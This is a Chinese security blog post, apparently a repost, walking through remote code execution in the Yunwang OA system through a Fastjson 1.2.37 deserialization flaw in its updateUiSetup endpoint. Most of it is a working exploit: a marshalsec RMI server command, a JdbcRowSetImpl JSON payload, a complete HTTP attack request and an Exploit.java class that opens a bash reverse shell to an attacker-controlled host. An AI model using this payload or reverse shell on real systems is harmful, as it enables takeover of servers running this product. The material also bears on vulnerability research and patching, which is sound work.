云网OA最新版 FastJson RCE

admin 2024年1月17日08:44:38评论70 views字数 1641阅读5分28秒阅读模式

下载地址:

https://gitee.com/bestfeng/yimioa?_from=gitee_search

安装的话参考他的官网就行了。

里面有详细的安装步骤。

项目中使用到的是fastjson1.2.37版本。

漏洞点在: 这里使用到了ParseObject方法。

com.cloudweb.oa.controller.updateUiSetup

云网OA最新版 FastJson RCE

使用marshalsec-0.0.3-SNAPSHOT-all.jar开启RMI监听。

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://127.0.0.1:8000/#Exploit" 1389

云网OA最新版 FastJson RCE

开一个python web服务。

python -m http.server 8000

payload如下:

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1389/Exploit", "autoCommit":true}}

请求包如下:

POST /oa//setup/updateUiSetup HTTP/1.1Host: 192.168.0.7:8096Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: skincode=lte; name=admin; pwd=; JSESSIONID=85F37A117572BE90EA4BA0ED10F77EF5Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 196
uiSetup={"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1389/Exploit", "autoCommit":true}}

云网OA最新版 FastJson RCE

可以看到接收到了uiSetup参数:

云网OA最新版 FastJson RCE

最终反序列化执行:

云网OA最新版 FastJson RCE

云网OA最新版 FastJson RCE

Exploit.java如下:

public class Exploit {    public Exploit(){        try {            java.lang.Runtime.getRuntime().exec(                    new String[]{"bash", "-c", "bash -i >& /dev/tcp/服务器IP/12345 0>&1"});        }        catch(Exception e){            e.printStackTrace();        }    }    public static void main(String[] argv){        Exploit e = new Exploit();    }}

原文始发于微信公众号(Relay学安全):云网OA最新版 FastJson RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月17日08:44:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   云网OA最新版 FastJson RCEhttps://cn-sec.com/archives/2401428.html

发表评论

匿名网友 填写信息